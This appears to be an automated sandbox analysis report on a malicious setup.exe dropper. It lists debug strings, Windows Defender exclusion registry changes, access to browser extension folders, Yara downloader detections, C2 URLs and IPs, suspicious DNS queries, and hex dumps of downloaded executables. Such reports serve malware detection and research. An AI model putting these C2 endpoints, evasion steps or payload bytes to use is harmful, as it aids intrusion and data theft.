Source:	Binary string: mozglue.pdbP source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: nss3.pdb@ source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: C:\Users\teres\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772EXE\obj\Debug\playApp_multy.pdb source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000000.2312651651.0000000000802000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3354901045.000000000077A000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: PE.pdbH] source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2421761793.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2468716919.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2421723577.0000000003231000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\CcYLxMOT.pdb source: yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2485120366.0000000005D70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: PE.pdb source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2421761793.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2468716919.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000002.2421723577.0000000003231000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: newsoftgnu.pdb source: 1719859269.0326595_setup.exe, 00000000.00000003.2242900895.0000021665139000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2719345291.00000000668DF000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: mozglue.pdb source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\teres\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\fxYgZM.pdb source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2478274768.00000000054E0000.00000004.08000000.00040000.00000000.sdmp, 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions			Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe			Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Yara detected MSILDownloaderGeneric

Source: Yara match

File source: Process Memory Space: 1719859269.0326595_setup.exe PID: 5720, type: MEMORYSTR

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199707802586
Source: Malware configuration extractor	URLs: https://t.me/g067n
Source: Malware configuration extractor	URLs: 77.105.135.107:3445

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: 01dIFB7Hn9Ga_GV72pHGpcce.exe.0.dr
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	File created: pYPeUajku47jJmxh1FdbLdJs.exe.0.dr

Performs DNS queries to domains with low reputation

Source:	DNS query: a.884736279.xyz
Source:	DNS query: ellaboratepwsz.xyz
Source:	DNS query: service-domain.xyz
Source:	DNS query: api2.check-data.xyz

Yara detected Generic Downloader

Source: Yara match	File source: 12.0.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: 1719859269.0326595_setup.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.6:49766 -> 77.105.135.107:3445
Source: global traffic	TCP traffic: 192.168.2.6:49770 -> 77.105.133.27:50505
Source: global traffic	TCP traffic: 192.168.2.6:49774 -> 49.13.159.121:9000

Source: global traffic

TCP traffic: 192.168.2.6:60387 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:06 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 17 Jun 2024 13:05:54 GMTETag: "a13400-61b15a0111080"Accept-Ranges: bytesContent-Length: 10564608Content-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 11 32 70 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 04 cd 00 00 00 00 00 3a c1 fa 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 91 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 c9 7c 01 3c 00 00 00 00 80 8e 01 d0 04 03 00 00 4d 8e 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 4d 7d 01 28 00 00 00 c0 4b 8e 01 38 01 00 00 00 00 00 00 00 00 00 00 00 40 f0 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 7e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 1d 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 e6 c9 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 a0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 c1 61 25 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 40 f0 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 60 27 9e 00 00 50 f0 00 00 28 9e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d0 04 03 00 00 80 8e 01 00 06 03 00 00 2e 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:06 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=newsoftgnu.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 4959240Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 25 20 81 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 f0 49 00 00 a0 01 00 00 00 00 00 fe 0d 4a 00 00 20 00 00 00 20 4a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 4b 00 00 02 00 00 6f 08 4c 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 0d 4a 00 4b 00 00 00 00 20 4a 00 dc 9d 01 00 00 00 00 00 00 00 00 00 00 92 4b 00 08 1a 00 00 00 c0 4b 00 0c 00 00 00 66 0d 4a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 ee 49 00 00 20 00 00 00 f0 49 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 9d 01 00 00 20 4a 00 00 9e 01 00 00 f2 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 4b 00 00 02 00 00 00 90 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 4a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 35 13 00 7c b5 18 00 03 00 00 00 6b 00 00 06 88 ea 2b 00 6a f4 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 42 00 00 00 01 00 00 11 2b 05 28 03 d9 79 56 28 ae 70 00 06 38 00 00 00 00 02 28 17 00 00 0a 20 00 00 00 00 17 3a 0f 00 00 00 26 38 05 00 00 00 38 da ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 00 00 2a 00 00 42 2b 05 28 19 ab 6e 4c 7e 01 00 00 04 14 fe 01 2a 00 00 00 36 2b 05 28 10 83 57 2f 7e 01 00 00 04 2a 00 00 13 30 03 00 48 00 00 00 01 00 00 11 2b 05 28 a4 44 63 58 28 ae 70 00 06 38 00 00 00 00 00 02 28 18 00 00 0a 20 00 00 00 00 17 3a 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 d4 ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 00 00 2a 42 2b 05 28 56 85 1d 44 7e 02 00 00 04 14 fe 01 2a 00 00 00 36 2b 05 28 a1 be 04 5c 7e 02 00 00 04 2a 00 00 13 30 03 00 bc 00 00 00 01 00 00 11 2b 05 28 93 Data Ascii: MZ@
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Jul 2024 22:05:06 GMTContent-Type: application/octet-streamContent-Length: 2520576Last-Modified: Mon, 01 Jul 2024 12:19:15 GMTConnection: keep-aliveETag: "66829ec3-267600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 24 fc be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 00 9d 00 f2 0d 00 00 14 0e 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 50 22 00 00 d0 9c 00 00 42 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 